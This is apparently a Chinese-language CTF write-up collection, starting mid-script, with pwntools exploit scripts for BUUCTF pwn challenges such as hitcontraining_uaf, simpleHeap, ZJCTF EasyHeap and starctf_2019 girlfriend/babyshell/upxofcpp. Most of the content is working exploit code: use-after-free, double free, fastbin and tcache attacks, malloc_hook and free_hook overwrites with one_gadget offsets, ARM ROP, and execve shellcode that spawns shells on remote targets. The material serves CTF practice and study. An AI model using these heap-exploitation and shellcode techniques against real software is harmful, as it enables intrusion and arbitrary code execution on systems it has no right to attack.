payload = '%64c%9$hn%1510c%10$hnaaa'+p64(stack_chk_fail+2) + p64(stack_chk_fail)
p.sendline(payload)
#gdb.attach(p)
p.interactive()
hitcontraining_uaf
关键词:uaf、堆溢出
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./hacknote')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 25882
debug = 0
if debug == 1:
p = process('./hacknote')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
def add_note(Size,content):
p.recvuntil('Your choice :')
p.sendline("1")
p.recvuntil('Note size :')
p.sendline(str(int(Size)))
p.recvuntil('Content :')
p.sendline(content)
def del_note(Index):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(Index))
def print_note(Index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(Index))
magic_addr= 0x8048945
# raw_input()
add_note(0x10,'aaa') #00-01
add_note(0x10,'bbb') #10-11
add_note(0x40,'ddd') #20-21
del_note(1) #de10 de11
del_note(0) #de00 de01
# raw_input()
add_note(0x8,p32(magic_addr)) #add00-add10
print_note(1) #eip-->10
p.interactive()
[V&N2020 公开赛]simpleHeap
关键词:off-by-one、malloc_hook改写、unsortbin泄露libc信息
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./vn_pwn_simpleHeap')
# libc = ELF('./libc')
ip = 'node3.buuoj.cn'
port = 29141
debug = 0
if debug == 1:
p = process('./vn_pwn_simpleHeap')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
def add(Size,Content):
p.recvuntil('choice: ')
p.sendline('1')
p.recvuntil('size?')
p.sendline(str(Size))
p.recvuntil('content:')
p.sendline(Content)
def edit(idx,Content):
p.recvuntil('choice: ')
p.sendline('2')
p.recvuntil('idx?')
p.sendline(str(idx))
p.recvuntil('content:')
p.sendline(Content)
pass
def show(idx):
p.recvuntil('choice: ')
p.sendline('3')
p.recvuntil('idx?')
p.sendline(str(idx))
pass
def delete(idx):
p.recvuntil('choice: ')
p.sendline('4')
p.recvuntil('idx?')
p.sendline(str(idx))
pass
def exit():
p.recvuntil('choice: ')
p.sendline('5')
pass
# raw_input('pause') #b *$rebase(0xf07)
add(24,'0000\n') #0x18+0x10
add(96,'1111\n') #0x60+0x10
add(96,'2222\n') #0x60+0x10
add(16,'3333\n') #0x10+0x10
payload = 'a'*0x18 + '\xe1' #rewrite next chunk low addr-->size
edit(0,payload)
# gdb.attach(p,"b *$rebase(0xf07)")
delete(1)
add(96,'1112\n')
show(2)
main_arena = u64(p.recvline()[:-1].ljust(8,'\x00'))-88
print hex(main_arena)
libcbase = main_arena - 0x3C4B20
malloc_hook = libcbase + 0x0000000003c4b10
realloc_hook = libcbase + 0x0000000003c4b08
free_hook = libcbase + 0x0000000003c67a8
one_gadget_addr = [0x45216,0x4526a,0xf02a4,0xf1147]
print '------malloc_hook =',hex(malloc_hook)
print '------realloc_hook =',hex(realloc_hook)
print '------free_hook =',hex(free_hook)
add(96,'4444\n')
# gdb.attach(p,"b *$rebase(0xf07)")
delete(4)
payload2 = p64(malloc_hook - 0x23)
edit(2,payload2)
add(96,'5555\n')
payload3 = 'a'*0x13+p32(one_gadget_addr[2])
add(96,payload3)
p.interactive()
堆的六种利用手法 : https://bbs.pediy.com/thread-246786.htm
jarvisoj_test_your_memory
关键词:scanf函数的栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./memory')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 28649
debug = 0
if debug == 1:
p = process('./memory')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
cat_flag_addr = 0x80487e0
main_addr = 0x8048677
system_addr = 0x8048440
payload = 'a'*0x13+'bbbb'+p32(system_addr) + p32(main_addr) + p32(cat_flag_addr)
# p.recv()
p.sendline(payload)
p.interactive()
[ZJCTF 2019]Login
关键词:64位c++程序、程序(**a1)(&s)执行栈上地址、strcmp函数\x00截断绕过判断
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./login')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 25531
debug = 0
if debug == 1:
p = process('./login')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
get_shell = 0x0000000000400E88
name = 'admin'
passwd = '2jctf_pa5sw0rd\0'.ljust(72,'\0') + p64(get_shell)
p.recv()
p.sendline(name)
p.recv()
p.sendline(passwd)
#gdb.attach(p)
p.interactive()
[ZJCTF 2019]EasyHeap
关键词:fastbin attack、堆溢出、heap of spirit、
key:通过数组头指针到free_got的地址,再修改第一个数组的值从而达到修改free_got的值(system_plt),再在heap中存放'/bin/sh\x00'作为参数,调用free达到了system(''/bin/sh\x00';xxxxxx;xxxxx),\x00会自动截断
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./easyheap')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 25097
debug = 0
if debug == 1:
p = process('./easyheap')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
cat_flag_addr = 0x000000000400C23
def add(Size,Content):
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Size of Heap :')
p.send(str(Size))
p.recvuntil('Content of heap:')
p.send(Content)
def edit(Index,Size,Content):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(Index))
p.recvuntil('Size of Heap :')
p.sendline(str(Size))
p.recvuntil('Content of heap :')
p.send(Content)
def delelte(Index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(Index))
def exit():
p.recvuntil('choice :')
p.sendline('4')
free_got = elf.got['free']
#0x6020ad
system_addr = elf.sym['system']
print '----system_add = ' + hex(system_addr)
print '----free_got = ' + hex(free_got)
raw_input('pause')
add(96,'0000\n') #0
add(96,'1111\n') #1
add(96,'2222\n') #2
add(16,'3333\n') #3
delelte(2)
paylaod = '/bin/sh\x00' + 'a'*88 + p64(0) + p64(0x71) + p64(0x6020ad)
edit(1,len(paylaod),paylaod)
add(96,'4444\n') #2
paylaod2 = 'b'*0x20 + 'bbb'+ p64(free_got)
add(96,paylaod2) #4
paylaod3 = p64(system_addr)
edit(0,len(paylaod3),paylaod3)
delelte(1)
#gdb.attach(p)
p.interactive()
jarvisoj_typo
关键词:32位arm、arm栈溢出、arm下的ROP、无符号
key:本应该用rizzo工具恢复符号,然后找出system_plt函数地址,但是不知道为什么用不上(可以通过寻找/bin/sh来定位system函数的地址),这里贴出找到的system位置进行mark(眼熟)一下。
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./typo')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 29978
debug = 0
if debug == 1:
p = process('./typo')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
pop_r0_r4_pc = 0x00020904
str_bin_sh = 0x0006c384
# system_addr = [0x0006c986,]
# system_addr1 = elf.plt['system']
# print 'system_addr1 = ',hex(system_addr1)
system_addr = 0x110B4
p.recvuntil('want to quit\n')
p.sendline()
p.recv()
payload = 'a' * 112 + p32(pop_r0_r4_pc) + p32(str_bin_sh) + p32(1) + p32(system_addr)
p.sendline(payload)
#gdb.attach(p)
p.interactive()
starctf_2019_girlfriend
关键词:uaf、double free、unsortbin泄露地址信息、修改malloc_hook
buuctf的这个题目是在ubuntu16环境下的、不用考虑tcache
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
# context.log_level = 'debug'
elf = ELF('./starctf_2019_girlfriend')
libc = ELF('./libc-2.23.so')
ip = 'node3.buuoj.cn'
port = 29337
debug = 0
if debug == 1:
p = process('./starctf_2019_girlfriend')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
def add(size,name='',call=''):
p.sendlineafter(':','1')
p.sendlineafter('name',str(size))
p.sendlineafter('name:',name)
p.sendlineafter('call:',call)
def show(idx):
p.sendlineafter(':','2')
p.sendlineafter('index:',str(idx))
p.recvuntil('name:\n')
def free(idx):
p.sendlineafter(':','4')
p.sendlineafter('index:',str(idx))
# raw_input('----------------gdb waiting----------------')
add(0x80, 'chunk0\n', '0000')#0
add(0x68, 'chunk1\n', '1111')#1
add(0x68, 'chunk2\n', '2222')#2
add(0x68, '/bin/sh\n', '3333')#3
free(0)
show(0)
# main_arena = u64(p.recv(6).ljust(8,'\x00')) -88
malloc_hook = u64(p.recv(6).ljust(8,'\x00')) -88 - 0x10
# print 'main_arena = ' ,hex(main_arena)
print 'malloc_hook =',hex(malloc_hook)
# libcbase = main_arena - 0x3B1C40
libcbase = malloc_hook - libc.sym['__malloc_hook']
system_addr = libcbase + libc.sym['system']
realloc = libcbase + libc.sym['realloc']
free_gook_addr = libcbase + libc.sym['__free_hook']
one_gadget_offset = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libcbase + one_gadget_offset[3]
# success("main_arena:"+hex(main_arena))
success("libcbase:"+hex(libcbase))
free(1)
free(2)
free(1)
add(0x68,p64(malloc_hook-0x23)+'\n','2111') #key chunk
add(0x68,'2222\n','2111')
add(0x68,'2111\n','2111')
payload = 'a'* (0x13-8) + p64(one_gadget) + p64(realloc)
add(0x68,payload,'4444')
p.recv()
#then send '1' can get shell
p.interactive()
关键词:uaf、double free、unsortbin泄露地址信息、tcache attack、
环境在ubuntu19.04下,libc-2.2.9.so需要通过tcache(2.26以后都需要考虑)
可以申请一个较大的chunk,大于等于0x420,释放后直接进入largebin,然后show进行libc的泄露,从而计算处libc_base,得到相关的地址(malloc_hook、system、onegadget、free_hook等)
name = "aaaa"
phone = '1'*0xc
add(0x440,name,phone) #0 put into largebin
add(0x18,name,phone) #1
delete(0)
show(0)
p.recvuntil("name:\n")
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - libc.symbols["__malloc_hook"] - 0x70
print "libc_base:",hex(libc_base)
free_hook = libc_base + libc.symbols["__free_hook"]
one_gadget = libc_base + 0xdf99d
system = libc_base + libc.symbols["system"]
malloc_hook = libc_base + libc.symbols["__malloc_hook"]
通过申请7个chunk+2个chunk共9个chunk,free出7个fastbin大小的chunk填充tcache,然后利用多余的两个chunk制造出double free。
add(0x440,name,phone) #2
for i in range(7):
add(0x68,name,phone) #3~9 malloc from unsorted bin
add(0x68,name,phone) #10 malloc from top chunk
add(0x68,name,phone) #11
delete(9)
for i in range(6):
delete(i+3) #3~8
add(0x68,name,phone) #12 == 8 0x580
add(0x68,name,phone) #13 == 7 0x4f0
##fill tcache
delete(10)
delete(11)
##double free
##fastbin 12->13->12
delete(12)
delete(13)
delete(12)
然后把tcache中的fastbin全部malloc出来,tcache清空后再malloc时,就会将fastbin里的chunk放入tcache,就能得到被我们double free的2个chunk,从而复写任意地址。(这里复写了free_hook的地址,然后free传入/bin/sh的chunk时,就会触发system(/bin/sh)从而get shell)
##empty tcache
for i in range(7):
add(0x68,name,phone) #14~20
add(0x68,p64(free_hook),phone) #21 == 12 fastbin 0x70 chunks put into tcache
add(0x68,name,phone) #22 == 13
add(0x68,"/bin/sh\x00",phone) #23 == 12
add(0x68,p64(system),phone) #24
##trigger
delete(23)
starctf_2019_babyshell
关键词:汇编指令、shellcraft、\x00截断。
from pwn import *
context.log_level='debug'
context.arch='amd64'
p=process('./starctf_2019_babyshell')
#gdb.attach(p,'b *0x4008cb')
# p=remote("34.92.37.22",10002)
shellcode = asm(shellcraft.sh())
p.sendlineafter(":","\x00ng"+shellcode) #gs\njaZ
p.interactive()
starctf_2019_upxofcpp
关键词:upx脱壳、heap段可执行的upx、uaf、vtable call to run shellcode
知识点:asm(jmp .+_n)
jmp .+0x10表示跳当前地址+0x10,可能是2字节或者5字节主要看n和符号例如+0x81和-0x7e(shellcode可以不连续了,还可以往回跳.)
- Fake the vtable via
malloc_consolidate, write your shellcode on the heap- Trigger the UAF vulnerability by
removeorshow, thencall raxwill jump on the shellcode- Details in
solve.py- It has nothing to do with libc 😛
from pwn import *
# p = process('./starctf_2019_upxofcpp')
p = remote('node3.buuoj.cn',29685)
context.log_level='debug'
def add(index,size,content):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil('Index:')
p.sendline(str(index))
p.recvuntil('Size:')
p.sendline(str(size))
p.recvuntil('stop:')
p.sendline(content)
def delete(index):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil('index:')
p.sendline(str(index))
def show(index):
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('index:')
p.sendline(str(index))
# gdb.attach(p)
payload = '''
mov rax,0x68732f6e69622f
push rax
push rsp
pop rdi
mov rsi,0
mov rdx,0
mov rax,0x3b
syscall
'''
print len(asm(payload,arch='amd64'))
payload = asm(payload,arch='amd64')
#print len(payload)
result =''
i = 0
while i<35:
result+=str(struct.unpack('<i',payload[i:i+4])[0])+' '
i+=4
result+='-1'
print result
add(0,0x22,'-1')
gdb.attach(p)
add(1,0x12,'1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2095775979 -1')
raw_input('go')
add(2,0x8,'-1')
raw_input('go')
#add(1,0x8,'1 2 1156288656 -1')
add(3,0x50,result)
raw_input('go')
#add(4,0x22,'-1')
#add(3,0x22,'-1')
delete(2)
raw_input('go')
delete(1)
raw_input('go')
delete(0)
#gdb.attach(p)
#delete(3)
show(0)
p.interactive()
